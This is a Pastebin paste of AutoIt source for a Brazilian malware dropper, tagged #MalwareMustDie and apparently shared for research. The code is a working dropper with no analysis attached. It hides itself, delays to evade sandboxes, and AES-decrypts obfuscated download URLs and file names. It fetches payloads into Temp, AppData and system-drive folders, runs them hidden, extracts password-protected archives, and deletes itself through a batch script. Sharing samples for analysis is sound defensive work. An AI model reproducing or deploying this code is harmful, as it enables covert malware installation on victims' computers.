Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Brazil AutoIt Malware - Dropper & Shellexec
- // #MalwareMustDie
- Opt("TrayIconHide", 1)
- Global $hmutex
- Local $closehandle
- If createmutex("1iu1gx6wtf8XX8Qgs23WglF7pHVE7", $hmutex) Then
- Sleep(0)
- Else
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- onautoitexit()
- Exit
- EndIf
- $init = TimerInit()
- While 1
- Sleep(250)
- $diff = TimerDiff($init)
- If $diff / 1000 >= 25 Then
- Sleep(0)
- ExitLoop
- EndIf
- WEnd
- Local $key = "1iu1gx6wtf8XX8Qgs23WglF7pHVE7"
- Local $lk = "334865BC36520346E0C1E1E80E851C9C85E28EAFDF2ED9C435EE1DB8659FB331"
- Local $fk = "7F526C99C294202AAD308A719AE29C93ABC72DC4A3DACE0C5A5AA8B2C5F69F37BE5684BEABE0EC9D6C66552570142913"
- Local $pass = "102030as"
- Local $s121 = "V0jB3Lk1S0ohgZYQrMl4pj"
- Local $vrtmp = ""
- Dim $base[4]
- Dim $array[7]
- $array[0] = "DD5AA5D0CC90E3A5093C88EE117132A1"
- $array[1] = "BCDA98C9F0011641ABD2BF11F2AC4587"
- $array[2] = "1F2F3D08ADA1FB0214BE2862C3ADE4AD"
- $array[3] = "AF94BB46CE3C9472E13AA925608FC37F"
- $array[4] = " *.mp4"
- $array[5] = "21CF70074AE1586E22D93C743A4CF40E"
- $array[6] = "93BE9C9A468F5C4543C1ED8CAB332A5FE3C001E933669C7D4BD959A2196637CC"
- Dim $fl[2]
- $fl[0] = "1DC242A0B18F861AD153F4903CB6403A"
- $fl[1] = "ACC16D423118CEA4717FA852B1EA3E3C"
- Dim $str1[7]
- Func createmutex($mutex, ByRef $hmutex)
- Dim $error_already_exists = 183
- Dim $lasterror, $closehandle
- Dim $retval
- $hmutex = DllCall("kernel32.dll", "long", "CreateMutexA", "ptr", 0, "int", 1, "str", $mutex)
- $lasterror = DllCall("kernel32.dll", "long", "GetLastError")
- If $lasterror[0] = $error_already_exists Then
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- $retval = 0
- Else
- $retval = 1
- EndIf
- Return $retval
- EndFunc
- Func onautoitexit()
- Dim $releasemutex, $closehandle
- If IsArray($hmutex) Then
- $releasemutex = DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $hmutex[0])
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- EndIf
- EndFunc
- Func ext($n)
- Dim $nm
- Dim $arext[3]
- $arext[0] = "C05D7B097FE50E38BEBADAD08D7C6E9A"
- $arext[1] = "AFCFA0ADFA04EA6120BFAEB086014AE9"
- $arext[2] = 1899 - 1899 & "x"
- Select
- Case $n = 1
- $nm = strcrpt(False, ext(3) & $arext[0], $key)
- Return $nm
- Case $n = 2
- $nm = strcrpt(False, ext(3) & $arext[1], $key)
- Return $nm
- Case $n = 3
- $nm = $arext[2]
- Return $nm
- EndSelect
- EndFunc
- Func nmfl($v, $nmex, $qtd)
- Dim $name
- Dim $ext
- For $i = 0 To $qtd
- $name = $name & Chr(Random(Asc("a"), Asc("z"), 6))
- Next
- If $v = 1 Then
- $ext = ext($nmex)
- Return $name & $ext
- Else
- Return $name
- EndIf
- EndFunc
- Func dow($lk, $dr, $fl, $nm)
- $base[$nm] = $dr & $fl
- DirCreate($dr)
- If NOT FileExists($dr & $fl) Then
- InetGet($lk, $dr & $fl)
- EndIf
- EndFunc
- Func sh($infl, $prm)
- If FileExists($infl) Then
- ShellExecute($infl, $prm, "", "open", @SW_HIDE)
- EndIf
- EndFunc
- Func gtdir($sfilepath)
- If NOT IsString($sfilepath) Then
- Return SetError(1, 0, -1)
- EndIf
- Local $filedir = StringRegExpReplace($sfilepath, "\\[^\\]*$", "")
- Return $filedir
- EndFunc
- Func un()
- Local $srbt = @TempDir & nmfl(0, 0, 8) & ".bat"
- Local $hrbt = FileOpen($srbt, 2)
- FileWrite($hrbt, ":start" & @CRLF & 'del "' & @AutoItExe & '"' & @CRLF & 'IF EXIST "' & @AutoItExe & '" goto start' & @CRLF & 'del "' & $srbt & '"')
- FileClose($hrbt)
- Run($srbt, "", @SW_HIDE)
- EndFunc
- Func strcrpt($bencrypt, $sdata, $spassword)
- _crypt_startup()
- Local $sreturn = ""
- If $bencrypt Then
- $sreturn = _crypt_encryptdata($sdata, $spassword, $calg_aes_256)
- Else
- $sreturn = BinaryToString(_crypt_decryptdata($sdata, $spassword, $calg_aes_256))
- EndIf
- _crypt_shutdown()
- Return $sreturn
- EndFunc
- strcrpt
- $tmp = @TempDir & "\" ;"
- $drmd = @AppDataDir & "\" :"
- $drcp = StringMid(@WindowsDir, 1, 2) & "\"
- $str1[0] = "A407B24B41A4AEA6C7DE8D84838569E8"
- $str1[1] = "35088C13149E3DAF5ED9EE207437B6F7"
- $str1[2] = "5F675C8B3973DD8C854DEDA25DB0F213"
- $str1[3] = "06F84E0A3F617F500F43A1661398D5DA"
- $str1[4] = "8956BA696DC2C905DA982296B1AD83C5"
- $str1[5] = "72DCE8B08F9EA9962B798A98251FDA8D"
- $str1[6] = "A0A960A1A6B5E25944CD3510DF58C38F" ;"
- ShellExecute(strcrpt(False, ext(3) & $fk, $key), "", "", strcrpt(False, ext(3) & $str1[6], $s121), @SW_SHOW)
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[0], $key), $tmp, nmfl(1, 1, Random(5, 10)), 0)
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[1], $key), $drcp & strcrpt(False, ext(3) & $array[5], $key) & nmfl(0, 2, Random(3, 5)) & "\", nmfl(0, 2, Random(5, 10)), 1)
- Sleep(5000)
- $vrtmp = gtdir($base[1]) & "\" ;"
- sh($base[0], strcrpt(False, ext(3) & $str1[0], $s121) & $base[1] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $vrtmp)
- Sleep(10000)
- If FileExists($vrtmp & strcrpt(False, ext(3) & $fl[0], $key)) Then
- ShellExecute($vrtmp & strcrpt(False, ext(3) & $fl[0], $key))
- Else
- un()
- EndIf
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[2], $key), $tmp, strcrpt(False, ext(3) & $fl[1], $key), 2)
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[3], $key), $drmd & strcrpt(False, ext(3) & $array[6], $key), nmfl(0, 2, Random(5, 10)), 3)
- Sleep(5000)
- sh($base[0], strcrpt(False, ext(3) & $str1[1], $s121) & $base[3] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $drmd & strcrpt(False, ext(3) & $array[6], $key) & $array[4] & strcrpt(False, ext(3) & $str1[4], $s121))
- Sleep(20000)
- While FileExists($base[0])
- FileDelete($base[0])
- WEnd
- FileDelete($base[1])
- FileDelete($base[3])
- un()
Add Comment
Please, Sign In to add comment